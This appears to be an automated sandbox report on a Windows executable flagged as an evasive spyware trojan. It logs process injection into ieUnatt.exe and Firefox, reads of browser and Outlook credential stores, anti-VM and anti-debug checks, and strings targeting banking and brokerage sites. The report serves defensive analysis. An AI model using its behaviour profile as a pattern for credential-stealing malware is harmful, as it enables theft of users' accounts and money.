                Source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs BalphRTkPS.exe
                Source: BalphRTkPS.exeBinary or memory string: OriginalFilenamepldkV.exe< vs BalphRTkPS.exe
                Source: BalphRTkPS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BalphRTkPS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BalphRTkPS.exe.logJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile created: C:\Users\user\AppData\Local\Temp\086604I_PJump to behavior
                Source: BalphRTkPS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BalphRTkPS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000317A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2679445070.0000000003158000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2682620628.0000000003184000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4012150420.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2679876223.000000000317A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BalphRTkPS.exeReversingLabs: Detection: 71%
                Source: BalphRTkPS.exeVirustotal: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"Jump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: BalphRTkPS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BalphRTkPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BalphRTkPS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: ieUnAtt.pdbGCTL source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ikSQhwOmrrnfH.exe, 00000007.00000002.4011664684.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4011666816.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BalphRTkPS.exe, BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pldkV.pdb source: BalphRTkPS.exe
                Source: Binary string: pldkV.pdbSHA256K source: BalphRTkPS.exe
                Source: BalphRTkPS.exeStatic PE information: 0xA5522322 [Thu Nov 22 02:59:46 2057 UTC]
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040D8D0 pushad ; iretd 6_2_0040D8D1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_004031B0 push eax; ret 6_2_004031B2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040D3DE pushad ; retf 6_2_0040D3DF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00414C77 push es; iretd 6_2_00414C79
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00415DE9 push ebp; iretd 6_2_00415E4B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040E61C push es; retf 6_2_0040E61D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00418699 push esp; iretd 6_2_0041869A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00405F99 push edi; retf 6_2_00405F9A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0170225F pushad ; ret 6_2_017027F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017027FA pushad ; ret 6_2_017027F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017309AD push ecx; mov dword ptr [esp], ecx6_2_017309B6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0170283D push eax; iretd 6_2_01702858
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01709939 push es; iretd 6_2_01709940
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E809AD push ecx; mov dword ptr [esp], ecx8_2_04E809B6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D8C02E push cs; iretd 8_2_02D8C02F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D91683 push esi; iretd 8_2_02D91684
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D854E6 push esp; iretd 8_2_02D854E7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B469 push es; retf 8_2_02D7B46A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D82970 pushfd ; retn F197h8_2_02D829E2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D82970 push eax; retf DEECh8_2_02D82A30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D90C93 push ebp; iretd 8_2_02D90C9A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D82C36 push ebp; iretd 8_2_02D82C98
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D72DE6 push edi; retf 8_2_02D72DE7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D90D69 pushad ; iretd 8_2_02D90D6A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051B052F pushfd ; retf 8_2_051B053E
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AF6AD push 00000058h; iretd 8_2_051AF6BE
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AF6D7 push 00000058h; iretd 8_2_051AF6BE
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051B0133 push ebp; iretd 8_2_051B0137
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051A61A1 push esi; retf 8_2_051A61AB
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051A5251 push esi; ret 8_2_051A5252
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051A5C7A push ss; iretd 8_2_051A5C82
                Source: BalphRTkPS.exeStatic PE information: section name: .text entropy: 7.253794404065134
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: BalphRTkPS.exe PID: 2064, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: A7C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: B7C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E rdtsc 6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_074EBD19 sldt word ptr [eax]0_2_074EBD19
                Source: C:\Users\user\Desktop\BalphRTkPS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI coverage: 3.0 %
                Source: C:\Users\user\Desktop\BalphRTkPS.exe TID: 5504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 5696Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 5696Thread sleep time: -84000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe TID: 612Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe TID: 612Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D8CC50 FindFirstFileW,FindNextFileW,FindClose,8_2_02D8CC50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 086604I_P.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%)
                Source: 086604I_P.8.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 086604I_P.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: firefox.exe, 0000000B.00000002.2793679245.000001880B0FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHHU(P
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 086604I_P.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 086604I_P.8.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 086604I_P.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 086604I_P.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 086604I_P.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4013033330.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 086604I_P.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 086604I_P.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E rdtsc 6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00417D83 LdrLoadDll,6_2_00417D83
